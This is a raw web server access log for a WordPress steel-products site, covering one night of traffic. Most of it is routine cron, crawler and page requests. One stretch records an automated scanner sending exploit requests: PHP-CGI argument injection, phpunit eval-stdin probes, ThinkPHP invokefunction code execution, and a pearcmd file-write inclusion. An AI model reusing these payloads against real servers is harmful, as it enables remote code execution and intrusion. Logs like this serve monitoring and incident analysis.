File: //home/logs/cqqizhou_access_2025-10-10.log
42.236.101.196 - - [10/Oct/2025:00:13:03 +0800] "GET / HTTP/1.1" 200 39369 "http://cqqizhou.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36 Edg/140.0.0.0; 360Spider"
36.133.115.36 - - [10/Oct/2025:00:17:17 +0800] "POST /wp-cron.php?doing_wp_cron=1760026637.1400198936462402343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.92 - - [10/Oct/2025:00:17:17 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [10/Oct/2025:00:18:20 +0800] "POST /wp-cron.php?doing_wp_cron=1760026700.0233969688415527343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.159.136.201 - - [10/Oct/2025:00:18:20 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [10/Oct/2025:00:28:18 +0800] "POST /wp-cron.php?doing_wp_cron=1760027298.0994760990142822265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
3.134.148.59 - - [10/Oct/2025:00:28:18 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
36.133.115.36 - - [10/Oct/2025:00:30:42 +0800] "POST /wp-cron.php?doing_wp_cron=1760027442.8026490211486816406250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
3.134.148.59 - - [10/Oct/2025:00:30:42 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
43.157.156.190 - - [10/Oct/2025:00:31:19 +0800] "GET /wp-content/uploads/2025/07/1751425283-qizhou.kf_.qq_.com_.webp HTTP/1.1" 200 16864 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [10/Oct/2025:00:37:56 +0800] "POST /wp-cron.php?doing_wp_cron=1760027876.5946359634399414062500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.91 - - [10/Oct/2025:00:37:56 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [10/Oct/2025:00:42:45 +0800] "POST /wp-cron.php?doing_wp_cron=1760028164.9647269248962402343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
170.106.11.141 - - [10/Oct/2025:00:42:45 +0800] "GET /wp-content/uploads/2025/07/1753453096- HTTP/1.1" 404 8989 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [10/Oct/2025:00:52:37 +0800] "POST /wp-cron.php?doing_wp_cron=1760028757.9085080623626708984375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.153.36.110 - - [10/Oct/2025:00:52:38 +0800] "GET /portfolio/duplex-stainless-steel/ HTTP/1.1" 200 18677 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [10/Oct/2025:01:02:46 +0800] "POST /wp-cron.php?doing_wp_cron=1760029366.6690909862518310546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [10/Oct/2025:01:02:46 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
43.130.71.237 - - [10/Oct/2025:01:03:19 +0800] "GET /about/ HTTP/1.1" 200 24239 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [10/Oct/2025:01:04:46 +0800] "POST /wp-cron.php?doing_wp_cron=1760029486.3240349292755126953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.92 - - [10/Oct/2025:01:04:46 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [10/Oct/2025:01:07:53 +0800] "POST /wp-cron.php?doing_wp_cron=1760029673.0242390632629394531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
115.248.8.65 - - [10/Oct/2025:01:07:53 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 404 31381 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:07:57 +0800] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 151919 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:07:59 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:02 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:04 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:06 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:08 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:10 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:12 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:14 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:16 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:18 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:21 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:23 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:25 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:27 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:29 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:31 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:33 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:35 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:37 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:39 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:41 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:44 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:46 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:48 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:50 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:53 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:55 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:57 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:08:59 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:09:02 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:09:04 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:09:06 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:09:08 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:09:10 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:09:12 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:09:14 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:09:16 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 27 "-" "libredtail-http"
36.133.115.36 - - [10/Oct/2025:01:09:19 +0800] "POST /wp-cron.php?doing_wp_cron=1760029759.8046529293060302734375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
115.248.8.65 - - [10/Oct/2025:01:09:20 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 200 65160 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:09:22 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 404 27 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:09:25 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 200 151919 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:09:29 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 200 151919 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:09:32 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
115.248.8.65 - - [10/Oct/2025:01:09:35 +0800] "GET /containers/json HTTP/1.1" 301 5 "-" "libredtail-http"
36.133.115.36 - - [10/Oct/2025:01:12:06 +0800] "POST /wp-cron.php?doing_wp_cron=1760029926.7291789054870605468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
162.62.132.25 - - [10/Oct/2025:01:12:06 +0800] "GET /portfolio/hot-dip-galvanized-coil/ HTTP/1.1" 200 18819 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [10/Oct/2025:01:22:53 +0800] "POST /wp-cron.php?doing_wp_cron=1760030573.0657210350036621093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.135.130.202 - - [10/Oct/2025:01:22:53 +0800] "GET /portfolio/remaining-rolls/ HTTP/1.1" 200 18696 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [10/Oct/2025:01:24:24 +0800] "POST /wp-cron.php?doing_wp_cron=1760030664.6439869403839111328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.91 - - [10/Oct/2025:01:24:24 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [10/Oct/2025:01:33:06 +0800] "POST /wp-cron.php?doing_wp_cron=1760031186.1455531120300292968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.135.139.165 - - [10/Oct/2025:01:33:06 +0800] "GET /logistics/ HTTP/1.1" 200 18248 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [10/Oct/2025:01:40:25 +0800] "POST /wp-cron.php?doing_wp_cron=1760031625.4954340457916259765625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
115.159.33.43 - - [10/Oct/2025:01:40:25 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36"
36.133.115.36 - - [10/Oct/2025:01:46:27 +0800] "POST /wp-cron.php?doing_wp_cron=1760031987.3305869102478027343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.153.76.247 - - [10/Oct/2025:01:46:27 +0800] "GET /portfolio-tag/%e9%9e%8d%e9%92%a2%e8%92%82%e6%a3%ae/ HTTP/1.1" 200 18122 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [10/Oct/2025:01:49:11 +0800] "POST /wp-cron.php?doing_wp_cron=1760032151.8493399620056152343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.92 - - [10/Oct/2025:01:49:12 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [10/Oct/2025:01:56:38 +0800] "POST /wp-cron.php?doing_wp_cron=1760032598.3149418830871582031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.155.129.131 - - [10/Oct/2025:01:56:38 +0800] "GET /club/ HTTP/1.1" 200 11903 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [10/Oct/2025:02:01:35 +0800] "POST /wp-cron.php?doing_wp_cron=1760032895.5782730579376220703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.70 - - [10/Oct/2025:02:01:35 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [10/Oct/2025:02:04:41 +0800] "POST /wp-cron.php?doing_wp_cron=1760033081.6273169517517089843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [10/Oct/2025:02:04:41 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [10/Oct/2025:02:04:56 +0800] "POST /wp-cron.php?doing_wp_cron=1760033096.4879379272460937500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.91 - - [10/Oct/2025:02:04:56 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [10/Oct/2025:02:06:19 +0800] "POST /wp-cron.php?doing_wp_cron=1760033179.3912739753723144531250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.153.74.75 - - [10/Oct/2025:02:06:19 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2Fabout%2F HTTP/1.1" 200 1103 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
167.71.176.116 - - [10/Oct/2025:02:15:06 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"
36.133.115.36 - - [10/Oct/2025:02:15:54 +0800] "POST /wp-cron.php?doing_wp_cron=1760033754.0431339740753173828125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.159.145.149 - - [10/Oct/2025:02:15:54 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2Fportfolio%2Fhot-dip-galvanized-coil%2F HTTP/1.1" 200 1204 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [10/Oct/2025:02:21:42 +0800] "POST /wp-cron.php?doing_wp_cron=1760034102.3558399677276611328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
195.178.110.201 - - [10/Oct/2025:02:21:42 +0800] "GET /.git/refs/ HTTP/1.1" 404 8987 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.5; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15"
36.133.115.36 - - [10/Oct/2025:02:23:40 +0800] "POST /wp-cron.php?doing_wp_cron=1760034220.1040699481964111328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
170.106.180.139 - - [10/Oct/2025:02:23:40 +0800] "GET /wp-content/uploads/2025/07/1753453029- HTTP/1.1" 404 8988 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [10/Oct/2025:02:25:24 +0800] "POST /wp-cron.php?doing_wp_cron=1760034324.0518059730529785156250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
54.146.7.91 - - [10/Oct/2025:02:25:24 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36"
36.133.115.36 - - [10/Oct/2025:02:34:33 +0800] "POST /wp-cron.php?doing_wp_cron=1760034873.0713620185852050781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
77.90.185.47 - - [10/Oct/2025:02:34:33 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0"
77.90.185.47 - - [10/Oct/2025:02:34:33 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 10.0; rv:102.0) Gecko/20100101 Firefox/102.0"
43.130.111.40 - - [10/Oct/2025:02:36:25 +0800] "GET /wp-content/uploads/2025/07/1751864664-Logistics800x500_1.webp HTTP/1.1" 200 76914 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [10/Oct/2025:02:36:27 +0800] "POST /wp-cron.php?doing_wp_cron=1760034987.7018148899078369140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.92 - - [10/Oct/2025:02:36:28 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
182.42.105.85 - - [10/Oct/2025:02:36:31 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [10/Oct/2025:02:45:01 +0800] "POST /wp-cron.php?doing_wp_cron=1760035501.1220679283142089843750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
119.249.100.113 - - [10/Oct/2025:02:45:01 +0800] "GET /robots.txt HTTP/1.1" 200 190 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
43.135.148.92 - - [10/Oct/2025:02:45:39 +0800] "GET /portfolio/%e5%86%b7%e8%bd%a7%e5%8d%b7/ HTTP/1.1" 200 18731 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [10/Oct/2025:02:49:03 +0800] "POST /wp-cron.php?doing_wp_cron=1760035743.6966030597686767578125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.91 - - [10/Oct/2025:02:49:04 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [10/Oct/2025:02:54:49 +0800] "POST /wp-cron.php?doing_wp_cron=1760036089.9378869533538818359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.167.232.38 - - [10/Oct/2025:02:54:50 +0800] "GET /wp-json/oembed/1.0/embed?url=http%3A%2F%2Fcqqizhou.com%2Fclub%2F HTTP/1.1" 200 1110 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [10/Oct/2025:03:06:07 +0800] "POST /wp-cron.php?doing_wp_cron=1760036767.7513659000396728515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.93 - - [10/Oct/2025:03:06:08 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [10/Oct/2025:03:13:07 +0800] "POST /wp-cron.php?doing_wp_cron=1760037187.7087481021881103515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.148.132 - - [10/Oct/2025:03:13:07 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36"
36.133.115.36 - - [10/Oct/2025:03:22:03 +0800] "POST /wp-cron.php?doing_wp_cron=1760037723.0605421066284179687500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.92 - - [10/Oct/2025:03:22:03 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [10/Oct/2025:03:24:10 +0800] "POST /wp-cron.php?doing_wp_cron=1760037850.2644178867340087890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
171.42.24.30 - - [10/Oct/2025:03:24:10 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3935.88 Safari/537.36"
171.42.24.30 - - [10/Oct/2025:03:24:10 +0800] "GET / HTTP/1.1" 200 39369 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3935.88 Safari/537.36"
171.42.24.30 - - [10/Oct/2025:03:24:10 +0800] "GET /contacts/ HTTP/1.1" 200 21496 "-" "Mozilla/5.0 (Windows NT 10.5; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3429.88 Safari/537.36"
36.133.115.36 - - [10/Oct/2025:03:27:37 +0800] "POST /wp-cron.php?doing_wp_cron=1760038057.2344191074371337890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
52.167.144.225 - - [10/Oct/2025:03:27:37 +0800] "GET /?s= HTTP/1.1" 200 19545 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [10/Oct/2025:03:35:33 +0800] "POST /wp-cron.php?doing_wp_cron=1760038533.0974109172821044921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.91 - - [10/Oct/2025:03:35:33 +0800] "GET / HTTP/1.1" 200 33466 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
